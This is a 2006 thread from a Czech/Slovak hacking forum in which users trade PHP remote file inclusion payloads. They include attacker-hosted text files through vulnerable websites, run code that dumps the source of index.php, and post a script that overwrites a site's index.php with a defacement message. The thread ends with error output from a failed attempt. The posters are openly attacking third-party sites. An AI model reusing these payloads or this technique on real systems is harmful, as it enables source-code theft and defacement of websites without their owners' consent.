Hosi pomozte s PHP injection

HackForum

Hosi pomozte s PHP injection#
Zdravim.
na wz som dal tst.txt ktoreho obsah je echo "hello world";
Potom som siel na www.igor.euweb.cz (v diskusi o php injection pise ze tom tam facha) tak som dal
[link] a ono to hadze
echo "Hello world"; preco sa ten skript nespustil?
Je to hrozne ak mate neaky web kde to jede tak dajte.thx.jogi
(odpovědět)
Jogi29.8.2006 22:40
re: Hosi pomozte s PHP injection#
A co tohle

[link]

Ty máš blbej zdroják v tom "tst.txt". Musíš mít jako já:

<?
show_source("index.php")
?>

(odpovědět)
Nazghul | E-mail | Website | ICQ 23636583629.8.2006 22:49
re: Hosi pomozte s PHP injection#
Ale on nechtěl zobrazit zdroják, ne? :)
Jogi: tst.txt musí vypadat takhle:
<?php
echo "hello world";
?>

(odpovědět)
InSAN3×N3T | E-mail | ICQ 30465121030.8.2006 10:00
re: Hosi pomozte s PHP injection#
InSAN3×N3T:koukam ze si do toho taky kopl a zacal ses ucit...
(odpovědět)
qteck....30.8.2006 10:44
re: Hosi pomozte s PHP injection#
Už jsem to dlouho plánoval, ale nějak nebyl čas.
(odpovědět)
InSAN3×N3T | E-mail | ICQ 30465121030.8.2006 11:06
Este tohle#
<?php
$subor = fopen("index.php", "r+");
fwrite = fwrite($subor, "Na tomto webe bola objavena vazna bezpecnostna chyba,...");
fclose($subor);


?>
Je to dobry kod na zapisanie retazca na zaciatok index-u ???
(odpovědět)
Jogi30.8.2006 12:22
re: Hosi pomozte s PHP injection#
LOL! :D

Tak to nekdo defacnul za vas.. :D Aspon to mohl zalepit.
(odpovědět)
XYZ30.8.2006 12:30
re: Hosi pomozte s PHP injection#
Nj, ale pořádc si na tom může zkoušet příklady php injekce :)
(odpovědět)
InSAN3×N3T | E-mail | ICQ 30465121030.8.2006 18:04
re: Hosi pomozte s PHP injection#
No na mojej stranke na ic.cz , kde to skusam, ked inkludnem teh skript hore tak to hadze:


Warning: fopen() [function.fopen.php]: Unable to access url.php in [link] on line 2
//insert.txt je ten php injection skript

Warning: fopen(url.php) [function.fopen.php]: failed to open stream: No such file or directory in [link] on line 2

Warning: fwrite(): supplied argument is not a valid stream resource in [link] on line 3

Warning: fclose(): supplied argument is not a valid stream resource in [link] on line 4
co sa s tym da robit ???
(odpovědět)
Jogi30.8.2006 18:10
PHP injection CHYBA ?#
Preco ked inkkludujem tento skript
<?php
$subor = fopen("index.php", "r+");
fwrite = fwrite($subor, "Na tomto webe bola objavena vazna bezpecnostna chyba,...");
fclose($subor);


?> (ktory je na wz.cz)
na ic.cz (na stranqe ktora podporuje php injection)
Vyskakuje toto:

No na mojej stranke na ic.cz , kde to skusam, ked inkludnem teh skript hore tak to hadze:


Warning: fopen() [function.fopen.php]: Unable to access url.php in [link] on line 2
//insert.txt je ten php injection skript

Warning: fopen(url.php) [function.fopen.php]: failed to open stream: No such file or directory in [link] on line 2

Warning: fwrite(): supplied argument is not a valid stream resource in [link] on line 3

Warning: fclose(): supplied argument is not a valid stream resource in [link] on line 4
co sa s tym da robit ???


(odpovědět)
Jogi 231.8.2006 11:32

Zpět
Svou ideální brigádu na léto najdete na webu Ideální brigáda
 
 
 

 		BBCode
© 2003–2025 SOOM.cz | ISSN 1804-7270 | info@soom.cz | IRC #soom | changelog | ZDNkYWQ